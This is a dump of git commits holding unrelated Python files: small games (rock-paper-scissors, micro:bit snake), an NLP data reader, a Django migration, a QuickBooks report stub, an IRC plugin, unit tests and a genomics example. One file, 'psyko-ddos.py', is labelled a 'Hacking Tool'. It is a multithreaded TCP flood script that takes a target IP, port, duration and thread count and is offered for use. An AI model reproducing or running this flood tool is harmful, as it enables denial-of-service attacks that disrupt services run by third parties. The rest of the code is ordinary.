8416f73011ff2d2e53a46e6b575faca919c61de7 | Create rockpaperScissors.py | rockpaperScissors.py | rockpaperScissors.py | #!/usr/bin/env/ python
#Henry Kudzanai Dambanemuya presents: Rock, Paper, Scissors
#Created: 10/13/2015
#Location: Notre Dame, Indiana
import random
import time
# Move codes used throughout the game.
rock = 1
paper = 2
scissors = 3
# Display names for each move code.
names = { rock: "Rock", paper: "Paper", scissors: "Scissors" }
# Winning map: each key beats the move it maps to.
rules = { rock: scissors, paper: rock, scissors: paper }
# Session win tallies, updated in result() and shown by scores().
player_score = 0
computer_score = 0
def start():
    # Entry point: greet the player, loop rounds until they decline a
    # rematch (game() returns a falsy value), then show final scores.
    global human
    print "\n"
    human = raw_input("Please enter your name: ");
    print "\n"
    print "Hi %r, let's play a game of Rock, Paper, Scissors." %human
    while game():
        pass
    scores()
def game():
    # Play one round: read the player's move, roll the computer's,
    # announce the outcome, then ask about a rematch.  The (truthy)
    # answer string means "play again"; None ends the session.
    human_move = move()
    cpu_move = random.randint(1, 3)
    result(human_move, cpu_move)
    return play_again()
def move():
    # Keep prompting until the player enters a valid move (1, 2 or 3).
    while True:
        print
        player = raw_input("Rock = 1\nPaper = 2\nScissors = 3\n\nMake a move: ")
        try:
            player = int(player)
            if player in (1,2,3):
                return player
        except ValueError:
            # Non-numeric input: fall through to the error message below.
            pass
        print "\n"
        print "Oops! I didn't understand that. Please enter 1, 2, or 3."
def result(player, computer):
    # Reveal the computer's move after a short countdown, decide the
    # round, and update the global win tallies.
    print "\n"
    print "1..."
    time.sleep(1)
    print "2..."
    time.sleep(1)
    print "3..."
    time.sleep(0.5)
    print "\n"
    print "Computer threw {0}!".format(names[computer])
    global player_score, computer_score
    if player == computer:
        print "\n"
        print "Tie Game"
    else:
        # rules[player] is the move that the player's move beats.
        if rules[player] == computer:
            print "\n"
            print "Your victory has been assured."
            player_score += 1
        else:
            print "\n"
            print "The computer laughs as you realize you have been defeated."
            computer_score += 1
def play_again():
print "\n"
answer = raw_input("Would you like to play again? Y/N?: ")
if answer in ("y", "Y", "yes", "Yes", "yeah!", "Yeah!", "Of course!"):
return answer
else:
print "\n"
print "Thanks for playing :)"
def scores():
    # Print the session tallies for the player and the computer.
    global player_score, computer_score, human
    print "\n"
    print "HIGH SCORES"
    print human, player_score
    print "Computer: ", computer_score
    print "\n"
# Run the interactive game only when executed as a script.
if __name__ == '__main__':
    start()
| Python | 0.000048 | |
a1ba3031171992e4c07bef13b6edcdb1b80e32e6 | Create psyko-ddos.py | psyko-ddos.py | psyko-ddos.py | """
Title: Psyko DDoS
Type: Hacking Tool
Version: 1.0
Author: Brandon Hammond
Summary: Psyko DDoS is a Python DDoS
tool that uses TCP packets
to conduct a layer 4 DDoS
attack on the target IP
address at the given port.
It uses multithreading to
distribute the DDoS attack
over multiple threads, thus
amplifying it.
"""
import os
import sys
import time
import socket
import threading
def ddosAttack(ip,port,timer):
#DDoS attack function
timeout=time.time()+timer
message="Psyko DDoS TCP Flood..."
print("DDoSing %s..." % ip)
while time.time()<timeout:
#Generate and send TCP packet to DDoS
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.sendto(message,(ip,port))
print("DDoS ended...") #Display this when DDoS has timed out
if __name__=="__main__":
#Main GUI
threads=[]
print("=")*50
print("Psyko DDoS")
print("v1.0")
print("By Brandon Hammond")
print("=")*50
try:
#Get all required values
ip=raw_input("IP: ")
port=input("Port: ")
timer=input("Time: ")
threads=input("Threads: ")
except:
#If invalid input type is entered this executes
print("Input error...")
for i in range(threads):
#Generate threads
t=threading.Thread(target=ddosAttack,args=(ip,port,timer))
t.start()
| Python | 0.000013 | |
dd36aef29cd1e45ec447260f9ac8848a86a430dc | Create ptb_reader.py | ptb_reader.py | ptb_reader.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import sys
import tensorflow as tf
def _read_words(filename):
with open(filename, "r") as f:
if sys.version_info[0] >= 3:
return f.read().replace("\n", "<eos>").split()
else:
return f.read().decode("utf-8").replace("\n", "<eos>").split()
def _build_vocab(filename):
data = _read_words(filename)
counter = collections.Counter(data)
count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))
words, _ = list(zip(*count_pairs))
word_to_id = dict(zip(words, range(len(words))))
return word_to_id
def _file_to_word_ids(filename, word_to_id):
data = _read_words(filename)
return [word_to_id[word] for word in data if word in word_to_id]
def ptb_raw_data(data_path = "data/"):
    # Load the PTB train/valid/test splits from *data_path* and return
    # (train_ids, valid_ids, test_ids, word_to_id).  The vocabulary is
    # built from the training file only, so words appearing solely in
    # the validation/test files are dropped from those splits.
    train_path = os.path.join(data_path, "ptb.train.txt")
    valid_path = os.path.join(data_path, "ptb.valid.txt")
    test_path = os.path.join(data_path, "ptb.test.txt")
    word_to_id = _build_vocab(train_path)
    train_data = _file_to_word_ids(train_path, word_to_id)
    valid_data = _file_to_word_ids(valid_path, word_to_id)
    test_data = _file_to_word_ids(test_path, word_to_id)
    return train_data, valid_data, test_data, word_to_id
| Python | 0.000004 | |
532fdfa4a0fa4f0f5f441a572eef739f081e6522 | Create hello.py | hello.py | hello.py | #!/usr/bin/env python
# Classic hello-world.  Parenthesised print behaves identically on both
# Python 2 (expression in parentheses) and Python 3 (function call).
print('hello world')
| Python | 0.999503 | |
98d956b6a249caeaee76732a0679c2dd3384cda7 | Create pytemplate.py | pytemplate.py | pytemplate.py | import os,sys,string
# Template file to parse: first CLI argument, or template.tf by default.
# (The original indexed sys.argv[1] unconditionally, which raised
# IndexError whenever the script was run without an argument.)
if len(sys.argv) > 1 and sys.argv[1] != "":
    file_name = sys.argv[1]
else:
    file_name = "template.tf"
# Stack of folder names from the template root down to the current
# nesting level; maintained by the parser loop below.
path = []
def build_path():
    # Join the folder stack into a backslash-terminated Windows path,
    # e.g. ["a", "b"] -> "a\\b\\".
    return "".join(folder + "\\" for folder in path)
# Stack of creation kinds ("folder" / "file") mirroring the bracket
# nesting while the template text is parsed.
type_state = []
def manage_state(word, operation):
    # Push *word* onto the state stack, or pop the top entry.
    # The *word* argument is ignored for the "pop" operation.
    if operation == "append":
        type_state.append(word)
    elif operation == "pop":
        type_state.pop()
class f_tree:
    # One node of the parsed template tree: a file or folder to create.
    identifier = 0        # sequence number assigned while parsing
    level = 0             # nesting depth (not used by the parser below)
    name = ""             # file or folder name
    creation_type = ""    # "file" or "folder"
    path = ""             # relative path, built while parsing
    father = None         # parent node, if any
    def __str__(self):
        # "<id> <kind> <name> <path>", e.g. "3 file a.txt x\a.txt".
        parts = (str(self.identifier), self.creation_type, self.name, self.path)
        return " ".join(parts)
# ---------------------------------------------------------------------------
# Template parser + creator.  Walks the template text character by
# character: "[" opens a folder scope, "{" a file scope, "]"/"}" close
# them; names accumulate between token characters and are recorded as
# f_tree nodes, which are then created on disk below.
# NOTE(review): string.replace() makes this Python-2 only, and paths use
# hard-coded backslashes (Windows only).
# ---------------------------------------------------------------------------
f = open(file_name, 'r')
text = string.replace(f.read(), " ","")
word_dictionary = []
word = ""
open_tokens = ['[','{','(']
close_tokens = [']','}',')']
general_tokens = [',','/','\\','\n','\t']
break_word = False
#states
#s -> none, folder, file, end_token
reading_token = False
identifier = 0
# NOTE(review): temp_state_identifier and pop_folder are never used.
temp_state_identifier = ""
pop_folder = False
for c in text:
    # A token character terminates the name collected so far.
    if general_tokens.count(c) > 0 or open_tokens.count(c) > 0 or close_tokens.count(c) > 0:
        reading_token = True
        break_word = True
    else:
        reading_token = False
    if break_word:
        if word != "":
            # Record the completed name as a node.  NOTE(review): this
            # rebinds "f", shadowing the open file handle above, and
            # type_state[-1] raises IndexError if the template starts
            # with a name before any "[" or "{" token.
            f = f_tree()
            f.identifier = identifier
            f.name = word
            f.creation_type = type_state[-1]
            # NOTE(review): attribute case mismatch -- the class defines
            # "father"; this creates a separate "Father" attribute.
            f.Father = None
            word_dictionary.append(f)
            if type_state[-1] == "folder":
                # Sibling folder at the same depth replaces the previous
                # entry on the path stack.
                if(len(type_state) == len(path)):
                    path.pop()
                path.append(word)
                f.path = build_path()
            if type_state[-1] == "file":
                f.path += word
            word = ""
            identifier += 1
        # Update the folder/file state stacks for the token itself.
        if c == "[":
            type_state.append("folder")
        elif c == "{":
            type_state.append("file")
        if c == "]":
            type_state.pop()
            path.pop()
        elif c == "}":
            type_state.pop()
    if not reading_token and type_state[-1] != "none":
        word += c
    reading_token = False
    break_word = False
# Create everything that was recorded.
for f in word_dictionary:
    if f.creation_type == "folder":
        # NOTE(review): the existence check uses the *relative* f.path
        # while the creation uses the absolute final_path, so the two can
        # disagree about what already exists.
        final_path = os.path.dirname(os.path.abspath(__file__)) +"\\"+ f.path
        if not os.path.exists(f.path):os.makedirs(final_path)
    if f.creation_type == "file":
        # NOTE(review): the returned file handle is never closed.
        open(f.path,"w+")
| Python | 0.000004 | |
2305b514df6d654dfb10445d67a6d3addf4b94cb | Implement a version of snake. | demos/snake.py | demos/snake.py | from microbit import *
import random
# number of time intensity of apple changes per movement of snake
_FRAME_COUNT = 10

# Directions as (row, column) deltas on the 5x5 LED grid.
N = (-1, 0)
W = (0, -1)
S = (1, 0)
E = (0, 1)


def turn_left(direction):
    # 90-degree rotation cycling N -> W -> S -> E -> N, computed
    # arithmetically instead of via an if/elif chain.
    drow, dcol = direction
    return (-dcol, drow)


def turn_right(direction):
    # Inverse rotation, cycling N -> E -> S -> W -> N.
    drow, dcol = direction
    return (dcol, -drow)
# Step one cell from *pos* in *direction*, wrapping around the 5x5 grid.
def get_next(pos, direction):
    row = (pos[0] + direction[0]) % 5
    col = (pos[1] + direction[1]) % 5
    return (row, col)
class Snake(object):
    """The snake: a head-first list of occupied cells, the current
    heading, and a flag telling the next move to grow by one cell."""

    def __init__(self):
        self.parts = [(2, 2)]     # start as a single cell in the centre
        self.direction = E        # initially heading east
        self.grows = False        # set when an apple has just been eaten

    def head(self):
        """Return the cell currently occupied by the snake's head."""
        return self.parts[0]

    def move(self):
        """Advance one cell in the current direction.

        When the growth flag is set it is consumed and the tail is kept,
        otherwise the tail cell is dropped.  Returns False when the new
        head collides with the body (game lost), True otherwise.
        """
        new_head = get_next(self.head(), self.direction)
        if not self.grows:
            self.parts.pop()
        self.grows = False
        self.parts.insert(0, new_head)
        return new_head not in self.parts[1:]

    def __len__(self):
        # Length of the snake in cells.
        return len(self.parts)
class Board(object):
    # 5x5 playing field: owns the intensity tiles, the apples and the
    # snake, and advances the game one frame at a time via step().
    def __init__(self, snake):
        self.snake = snake
        # 5x5 grid of LED intensities (0..9), rebuilt every snake move.
        self.tiles = [[0] * 5] + [[0] * 5] + [[0] * 5] + [[0] * 5] + [[0] * 5]
        self.apples = []
        # generate two apples
        self.add_random_apple()
        self.add_random_apple()
        # count number of frames; apple-pixels change more frequently than the
        # snake moves
        self.frame_count = 0
        # apples are distinguishable by (rapidly) changing intensity
        self.apple_intensity = 0
    # Set the tile at grid position *pos* (row, col) to *intensity*.
    def set(self, pos, intensity):
        self.tiles[pos[0]][pos[1]] = intensity
    # Choose a random position that is not occupied.
    # Choosing out of a list of free positions is not feasable due to
    # memory limitations.
    def add_random_apple(self):
        # Walk the k-th free cell (k random in 1..free), skipping cells
        # occupied by the snake or an existing apple.
        free = 25 - len(self.snake.parts) - len(self.apples)
        if free == 0:
            return # can't add another apple
        i = -1
        for k in range(random.randint(1, free)):
            i += 1
            while (i//5, i%5) in self.snake.parts or (i//5, i%5) in self.apples:
                i += 1
        self.apples.append((i // 5, i % 5))
    def draw_snake(self):
        # Render the snake with a brightness gradient: head brightest (9),
        # fading towards the tail.
        slen = len(self.snake)
        if slen < 9:
            for pos, intensity in zip(self.snake.parts, range(9, 1, -1)):
                self.set(pos, intensity)
        else:
            # Longer snakes: divide the body into 8 tail segments plus a
            # front part that absorbs the remainder.
            tail_part_size = slen // 8
            head_size = slen - tail_part_size * 7
            # set the 8 parts of the tail to intensities 2,..,8
            for i in range(8, 1, -1):
                beg = head_size + (8-i) * tail_part_size
                part = self.snake.parts[beg:beg + tail_part_size]
                for pos in part:
                    self.set(pos, i)
            # set the front part of the snake to highest intensity 9
            for pos in self.snake.parts[0:head_size]:
                self.set(pos, 9)
    def draw(self):
        # Push the tile buffer to the micro:bit display (x = column).
        for xy in range(25):
            display.set_pixel(xy%5, xy//5, self.tiles[xy//5][xy%5])
    def step(self):
        # Advance one frame.  Returns 'l' on loss, 'w' on win (length 30)
        # or 'c' to continue.  The snake only moves every _FRAME_COUNT
        # frames; apples pulse on every frame.
        if self.frame_count == 0:
            # clear tiles
            for line in self.tiles:
                for j in range(len(line)):
                    line[j] = 0
            # move snake
            if self.snake.move() == False:
                return 'l'
            if len(self.snake) == 30:
                return 'w'
            if self.snake.head() in self.apples:
                # Eat the apple: respawn one and grow on the next move.
                self.apples.remove(self.snake.head())
                self.add_random_apple()
                self.snake.grows = True
            self.draw_snake()
        # draw apple tiles
        self.apple_intensity += 1
        self.apple_intensity %= 8
        for apple in self.apples:
            self.set(apple, 2 + self.apple_intensity)
        self.draw()
        self.frame_count += 1
        self.frame_count %= _FRAME_COUNT
        return 'c'
# Game loop: button A turns left, button B turns right.  step() returns
# 'c' to continue, 'w' on a win and 'l' on a loss; after showing the
# happy/sad face, wait for any button press to start a new game.
while True:
    snake = Snake()
    board = Board(snake)
    state = board.step()
    while state == 'c':
        if button_a.get_presses() > 0:
            snake.direction = turn_left(snake.direction)
        elif button_b.get_presses() > 0:
            snake.direction = turn_right(snake.direction)
        sleep(50)
        state = board.step()
    if state == 'w':
        display.show(Image.HAPPY)
    else:
        display.show(Image.SAD)
    while button_a.get_presses() + button_b.get_presses() == 0:
        sleep(200)
| Python | 0.998979 | |
f4d70c81c55e744ef6ff4dd9fded2ca6e771fe30 | add missing profiles migration | profiles/migrations/0003_auto_20210225_1754.py | profiles/migrations/0003_auto_20210225_1754.py | # Generated by Django 2.2.16 on 2021-02-25 17:54
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: updates the choice list on
    # Profile.api_tier.  Choice changes only affect validation, not the
    # database column.  Do not edit generated migrations by hand.
    dependencies = [
        ("profiles", "0002_auto_20200903_1942"),
    ]
    operations = [
        migrations.AlterField(
            model_name="profile",
            name="api_tier",
            field=models.SlugField(
                choices=[
                    ("inactive", "Not Yet Activated"),
                    ("suspended", "Suspended"),
                    ("default", "Default (new user)"),
                    ("legacy", "Legacy"),
                    ("bronze", "Bronze"),
                    ("silver", "Silver"),
                    ("unlimited", "Unlimited"),
                ],
                default="inactive",
            ),
        ),
    ]
| Python | 0.000001 | |
14caf06fe4f30be96f0397f935df1daf48d40d81 | Create report.py | report.py | report.py | """
This module is for API consumer-side reporting on QBOv3-querried transactions.
In addition to mimmicking such features as "QuickReport," "General Ledger,"
"Profit & Loss," et al, it provides some helpful functions, such as finding
the starting and ending balance of a particular account as of a particular
date and, of course, finding the total activity between two dates.
"""
import reference as qbrefs
import massage as qbm
import copy
def quick_report(qbo_session, filter_attributes={}, headers=True):
    """
    Simulates a 'Quick Report' in QB by pulling getting the lines of
    all transactions that match the attributes we're passed.
    This match is a simple eq (=) matcher because that's how QB does it
    as a first cut. You can later filter by date, total by various things,
    etc., but this doesn't do that...other reporting tools will.
    One potentially helpful tool though is the ability to include multiple
    criteria for any one attribute (in the form of a list), so you can
    run a quick_report on several classes and several accounts at once, e.g.
    Note that even though QB can do a "Quick Report" on a vendor
    or other Name List-type object, this method can't (yet). This is for
    transactions ONLY.
    Also note that because a quick_report pulls in PARTIAL transactions,
    we aren't going to return whole transactions. Rather, we're going
    to return ledger-like lines of relevant transactions.
    (See massage.ledgerize() for more info on the output of this method.)
    As a courtesy, we WILL sort the transactions by date (as qb would...)
    """
    # NOTE(review): the mutable default filter_attributes={} is harmless
    # here (it is only read and deep-copied), but filter_attributes=None
    # with an explicit check would be safer.  Also note this function is
    # Python-2 only ("long" and dict.iterkeys() below).
    #basically, you can filter on any attribute massage.ledgerize() kicks out
    # Attribute name -> index into a ledgerized line.  NOTE(review):
    # index 12 is intentionally absent here (11 jumps to 13); confirm
    # against massage.ledgerize()'s output layout.
    filterable_attributes = {
        "TxnDate":0, "qbbo_type":1, "entity_id":2,
        "line_number":3, "document_type":4,
        "domain":5, "user_number":6,
        "CreateTime":7, "LastUpdatedTime":8, "SyncToken":9, "Adjustment":10,
        "account":11, "amount":13, "description":14, "name":15,
        "linked_transactions":16
    }
    line_i = filterable_attributes["line_number"]
    # Normalize: every filter value becomes a list (white-list) so a
    # caller can pass either a scalar or several alternatives.
    fa = copy.deepcopy(filter_attributes)
    for a in filter_attributes:
        if not a in filterable_attributes:
            raise Exception("QuickReport() doesn't know how to filter on"+
                            " %s. Please use one of:\n%s" %
                            (a, filterable_attributes))
        #yes, we're being permissive
        if isinstance(filter_attributes[a],(int,float,long,str)):
            fa[a]=[filter_attributes[a]]
        elif isinstance(filter_attributes[a],(list,tuple)):
            fa[a]=filter_attributes[a]
        else:
            raise Exception("filter_attributes items must be lists," + \
                            "tuples, or stand-alone values")
    # Collect every ledger line of every transaction, keyed by
    # qbbo-type + entity id + line number so lines stay unique.
    transactions = qbo_session.transactions()
    entity_list = qbm.entity_list(transactions)
    ledger_lines_dict = {}
    for transaction in entity_list:
        qbbo, Id, _ = transaction
        this_transactions_lines = (qbo_session.ledgerize(transaction))
        for line in this_transactions_lines:
            k = qbbo+Id+str(line[line_i])
            ledger_lines_dict[k] = line
    #let's first sort by date...
    date_ordered_k_list = sorted(ledger_lines_dict.iterkeys(), key= \
                                 lambda k: ledger_lines_dict[k][0])
    # First row is a header line (ledgerize with headers=True).
    filtered_lines = [qbo_session.ledgerize("_", headers=True)]
    for k in date_ordered_k_list:
        ledger_line = ledger_lines_dict[k]
        #print ledger_line
        #now let's apply the filter, white-list style
        # NOTE(review): this is OR semantics across filter attributes,
        # and a line matching several attributes is appended once per
        # match (duplicates).  If AND semantics were intended, check all
        # attributes before a single append.
        for a in fa:
            white_list = fa[a]
            #sometimes a Line will just HAVE the attribute
            #e.g. a JournalEntry line will always have an account
            #othertimes, we'll have to look it up with a cross reference
            #e.g. an Invoice line will NOT have an account, it'll have
            #an item, so we need to look up the account in the item
            #so we're breaking that functionality out into it's own function
            i = filterable_attributes[a]
            if ledger_line[i] in white_list:
                filtered_lines.append(ledger_line)
    return filtered_lines
def pnl(qbo_session, start_date="first", end_date="last", period = "years"):
    # Placeholder: Profit & Loss report is not implemented yet.
    raise NotImplementedError
def bs(qbo_session, first_date="first", last_date="last", period = "years"):
    # Placeholder: Balance Sheet report is not implemented yet.
    raise NotImplementedError
def cf(qbo_session, start_date="first", end_date="last", period = "years"):
    # Placeholder: Cash Flow report is not implemented yet.
    raise NotImplementedError
| Python | 0 | |
79acf77b7d711c88ea0ca8a733721ce5285f9a00 | Create Randomkick.py | Randomkick.py | Randomkick.py | __module_name__ = 'Random Kick Reason'
__module_version__ = '0.1'
__module_description__ = 'Kicks the designated player with a random kick reason.'
__module_author__ = 'Jake0720'
rkickhelp = '\x02USAGE: /rk <nick>'
import xchat
import random
def rk(word, word_eol, userdata):
    # xchat callback for "/rk <nick>": kick the named user with a
    # randomly chosen reason.  word[0] is the command, word[1] the nick.
    rkicks = ('Goodbye', 'See you later', 'Cya', 'Bye', 'Later!')
    if len(word) < 2:
        # No nick supplied: show usage instead of raising IndexError
        # (which the old bare except silently turned into "Error!").
        xchat.prnt(rkickhelp)
        return
    try:
        xchat.command('kick ' + word[1] + ' ' + random.choice(rkicks))
    except Exception:
        # Narrowed from a bare "except:" so KeyboardInterrupt/SystemExit
        # are no longer swallowed.
        xchat.prnt('\x0304Error!')
def onUnload(userdata):
    # Announce in the client when xchat unloads this plugin.
    xchat.prnt('\x0304 %s has been unloaded.' % __module_name__)
# Register the /rk command (with its help text) and the unload hook,
# then announce that the plugin is active.
xchat.hook_command('rk', rk, help=rkickhelp)
xchat.hook_unload(onUnload)
xchat.prnt('\x0304 %s has been loaded.' % __module_name__)
| Python | 0 | |
d021c05e483f556122d0f3251c2a299e0c47792c | add language detection code (even if it's not used) | src/detect_language.py | src/detect_language.py | def determine_language(item):
    # Best-effort language detection for an HTML document *item*:
    # strip <script>/<style>, classify the visible text with langid, and
    # re-check apparently-foreign text after ASCII transliteration so
    # accented English is still reported as 'en'.
    #
    # NOTE(review): boil_soup() and unidecode() are used below but are
    # neither defined nor imported in this module, so calling this
    # function raises NameError as-is.  They presumably come from a
    # BeautifulSoup helper and the unidecode package -- confirm and add
    # the imports.
    #
    # NOTE(review): when the first classification already yields 'en',
    # execution falls off the end and the function returns None instead
    # of 'en' -- confirm whether callers rely on that, otherwise add a
    # final "return lang".
    import langid
    # latin my ass
    def classify(s):
        # langid.rank returns (lang, score) pairs, best first; a
        # top-ranked "la" (Latin) result is treated as a misfire and the
        # runner-up is used instead.
        rank = langid.rank(s)
        if rank[0][0] == 'la':
            return rank[1][0]
        return rank[0][0]
    # extract text
    soup = boil_soup(item)
    for tag in ['script', 'style']:
        for el in soup.find_all(tag):
            el.extract()
    s = soup.body.text
    # determine language
    lang = classify(s)
    if lang != 'en':
        if classify(unidecode(s)) == 'en':
            return 'en'
        return lang
| Python | 0 | |
7961b5cf5d2cae486d898cd7885986cd3c685dc2 | Add simple test for point defects filter | atoman/filtering/filters/tests/test_pointDefects.py | atoman/filtering/filters/tests/test_pointDefects.py |
"""
Unit tests for the point defects filter
"""
import copy
import unittest
import numpy as np
from ....lattice_gen import lattice_gen_pu3ga
from ....system import lattice
from .. import pointDefectsFilter
from .. import base
################################################################################
class TestPointDefectsFilter(unittest.TestCase):
    """
    Test point defects
    - by type -- turning each off
    - split ints
    - vac rad ?
    - acna
    - big example too
    - filter species
    - clusters
    """
    def setUp(self):
        """
        Called before each test: builds a Pu3Ga reference lattice and an
        input lattice containing one antisite plus a split interstitial
        (atoms 0 and 4 straddle site 4, leaving site 0 vacant).
        """
        # generate reference lattice
        args = lattice_gen_pu3ga.Args(NCells=[10,10,10], pbcx=True, pbcy=True, pbcz=True)
        gen = lattice_gen_pu3ga.Pu3GaLatticeGenerator()
        status, self.ref = gen.generateLattice(args)
        if status:
            raise unittest.SkipTest("Generate lattice failed (%d)" % status)
        # make input lattice
        self.inp = copy.deepcopy(self.ref)
        self.inp.PBC[:] = 1
        # vacancy and split: move atom 0 onto atom 4's site (pos[12:15] is
        # atom 4's xyz) and displace the pair by -/+1.4 along z about it
        self.inp.pos[0] = self.inp.pos[12]
        self.inp.pos[1] = self.inp.pos[13]
        self.inp.pos[2] = self.inp.pos[14] - 1.4
        self.inp.pos[14] += 1.4
        # antisite
        self.inp.specie[30] = 1
        # filter
        self.filter = pointDefectsFilter.PointDefectsFilter("Point defects")

    def tearDown(self):
        """
        Called after each test
        """
        # remove refs
        self.inp = None
        self.ref = None
        self.filter = None

    def makeFilterInput(self):
        """Make filter input with freshly allocated defect index arrays."""
        filterInput = base.FilterInput()
        filterInput.inputState = self.inp
        filterInput.refState = self.ref
        filterInput.interstitials = np.empty(self.inp.NAtoms, dtype=np.int32)
        filterInput.vacancies = np.empty(self.ref.NAtoms, dtype=np.int32)
        filterInput.antisites = np.empty(self.ref.NAtoms, dtype=np.int32)
        filterInput.onAntisites = np.empty(self.ref.NAtoms, dtype=np.int32)
        filterInput.splitInterstitials = np.empty(3 * self.ref.NAtoms, dtype=np.int32)
        filterInput.defectFilterSelected = True
        return filterInput

    def test_pointDefectsSimple(self):
        """
        Point defects simple
        """
        # settings
        settings = pointDefectsFilter.PointDefectsFilterSettings()
        settings.updateSetting("vacancyRadius", 1.3)
        settings.updateSetting("showInterstitials", True)
        settings.updateSetting("showAntisites", True)
        settings.updateSetting("showVacancies", True)
        settings.updateSetting("findClusters", False)
        settings.updateSetting("neighbourRadius", 3.5)
        settings.updateSetting("minClusterSize", 3)
        settings.updateSetting("maxClusterSize", -1)
        settings.updateSetting("calculateVolumes", False)
        settings.updateSetting("calculateVolumesVoro", True)
        settings.updateSetting("calculateVolumesHull", False)
        settings.updateSetting("identifySplitInts", True)
        settings.updateSetting("useAcna", False)
        settings.updateSetting("acnaMaxBondDistance", 5.0)
        settings.updateSetting("acnaStructureType", 1)
        settings.updateSetting("filterSpecies", False)
        settings.updateSetting("visibleSpeciesList", [])
        # filter input
        filterInput = self.makeFilterInput()
        # call filter
        result = self.filter.apply(filterInput, settings)
        self.assertIsInstance(result, base.FilterResult)
        # check result: one vacancy (site 0), one antisite (site 30) and one
        # split interstitial centred on site 4
        self.assertEqual(len(filterInput.vacancies), 1)
        self.assertEqual(filterInput.vacancies[0], 0)
        self.assertEqual(len(filterInput.interstitials), 0)
        self.assertEqual(len(filterInput.antisites), 1)
        self.assertEqual(filterInput.antisites[0], 30)
        self.assertEqual(len(filterInput.onAntisites), 1)
        self.assertEqual(filterInput.onAntisites[0], 30)
        self.assertEqual(len(filterInput.splitInterstitials), 3)
        self.assertEqual(filterInput.splitInterstitials[0], 4)
        splits = filterInput.splitInterstitials
        self.assertTrue(splits[1] == 0 or splits[1] == 4)
        # The pair consists of atoms 0 and 4 in either order, so splits[2]
        # must be whichever of the two splits[1] is not.  BUGFIX: the
        # original computed ``0 if splits[1] == 4 else 0`` (always 0), which
        # only passed when the filter listed atom 4 first; cf. the v2/i2
        # computations below.
        s2 = 0 if splits[1] == 4 else 4
        self.assertEqual(splits[2], s2)
        ### SPLIT INTS OFF ###
        # update settings: without split identification the pair is reported
        # as two vacancies plus two interstitials
        settings.updateSetting("identifySplitInts", False)
        # filter input
        filterInput = self.makeFilterInput()
        # call filter
        result = self.filter.apply(filterInput, settings)
        self.assertIsInstance(result, base.FilterResult)
        # check result
        self.assertEqual(len(filterInput.vacancies), 2)
        vacs = filterInput.vacancies
        self.assertTrue(vacs[0] == 0 or vacs[0] == 4)
        v2 = 0 if vacs[0] == 4 else 4
        self.assertEqual(vacs[1], v2)
        self.assertEqual(len(filterInput.interstitials), 2)
        ints = filterInput.interstitials
        self.assertTrue(ints[0] == 0 or ints[0] == 4)
        i2 = 0 if ints[0] == 4 else 4
        self.assertEqual(ints[1], i2)
        self.assertEqual(len(filterInput.antisites), 1)
        self.assertEqual(filterInput.antisites[0], 30)
        self.assertEqual(len(filterInput.onAntisites), 1)
        self.assertEqual(filterInput.onAntisites[0], 30)
        self.assertEqual(len(filterInput.splitInterstitials), 0)
| Python | 0 | |
f0392ebda49fa0222a3b317f50002d7e03659f47 | Test we can approve Flutterwave bank accounts | bluebottle/funding_flutterwave/tests/test_states.py | bluebottle/funding_flutterwave/tests/test_states.py | from bluebottle.files.tests.factories import PrivateDocumentFactory
from bluebottle.funding.tests.factories import FundingFactory, PlainPayoutAccountFactory, \
BudgetLineFactory
from bluebottle.funding_flutterwave.tests.factories import FlutterwaveBankAccountFactory
from bluebottle.test.utils import BluebottleTestCase
from bluebottle.initiatives.tests.factories import InitiativeFactory
class FlutterwavePayoutAccountTestCase(BluebottleTestCase):
    """Verify that approving a Flutterwave bank account cascades correctly."""

    def setUp(self):
        initiative = InitiativeFactory.create(status='approved')
        self.initiative = initiative
        self.funding = FundingFactory.create(initiative=initiative)
        self.document = PrivateDocumentFactory.create()
        self.payout_account = PlainPayoutAccountFactory.create(document=self.document)
        self.bank_account = FlutterwaveBankAccountFactory.create(
            connect_account=self.payout_account
        )
        self.funding.bank_account = self.bank_account
        self.funding.save()
        BudgetLineFactory.create(activity=self.funding)

    def test_approve_bank_account(self):
        # Verifying the bank account should mark both accounts 'verified'
        # and move the funding activity to 'submitted'.
        self.bank_account.states.verify(save=True)
        expectations = [
            (self.bank_account, 'verified'),
            (self.payout_account, 'verified'),
            (self.funding, 'submitted'),
        ]
        for obj, expected_status in expectations:
            obj.refresh_from_db()
            self.assertEqual(obj.status, expected_status)
| Python | 0 | |
9c3449cdfa7b39069b691b31ff75defa7cf9b302 | add example.py | doc/example.py | doc/example.py | import numpy as np
import os
import metaseq
# ChIP (ATF3 in K562) and companion control BAM files bundled with metaseq,
# chr17 only.  NOTE(review): 'Rxlch' is presumably the input/control track --
# confirm against the ENCODE naming scheme.
ip_filename = metaseq.helpers.example_filename(
    'wgEncodeHaibTfbsK562Atf3V0416101AlnRep1_chr17.bam')
input_filename = metaseq.helpers.example_filename(
    'wgEncodeHaibTfbsK562RxlchV0416101AlnRep1_chr17.bam')
ip_signal = metaseq.genomic_signal(ip_filename, 'bam')
input_signal = metaseq.genomic_signal(input_filename, 'bam')
# If you already have TSSs, skip this part.
import gffutils
# Pre-built gffutils database of Ensembl GRCh37.66 annotations for chr17.
db = gffutils.FeatureDB(
    metaseq.example_filename('Homo_sapiens.GRCh37.66_chr17.gtf.db'))
import pybedtools
from pybedtools.featurefuncs import TSS
from gffutils.helpers import asinterval
def tss_generator():
    """Yield a +/-1000 bp window around the TSS of every annotated transcript."""
    for tx in db.features_of_type('transcript'):
        yield TSS(asinterval(tx), upstream=1000, downstream=1000)
# Build (or reuse) the TSS interval file and the binned signal arrays; both
# are cached on disk so re-runs skip the expensive steps.
if not os.path.exists('tsses.gtf'):
    tsses = pybedtools.BedTool(tss_generator()).saveas('tsses.gtf')
tsses = pybedtools.BedTool('tsses.gtf')
from metaseq import persistence
if not os.path.exists('example.npz'):
    # 100 bins across each 2 kb window, normalised to reads per million.
    ip_array = ip_signal.array(tsses, bins=100, processes=8)
    input_array = input_signal.array(tsses, bins=100, processes=8)
    ip_array /= ip_signal.mapped_read_count() / 1e6
    input_array /= input_signal.mapped_read_count() / 1e6
    persistence.save_features_and_arrays(
        features=tsses,
        arrays={'ip': ip_array, 'input': input_array},
        prefix='example',
        link_features=True,
        overwrite=True)
features, arrays = persistence.load_features_and_arrays(prefix='example')
# Input-subtracted enrichment, sorted by TIP z-score for the heatmap.
normalized = arrays['ip'] - arrays['input']
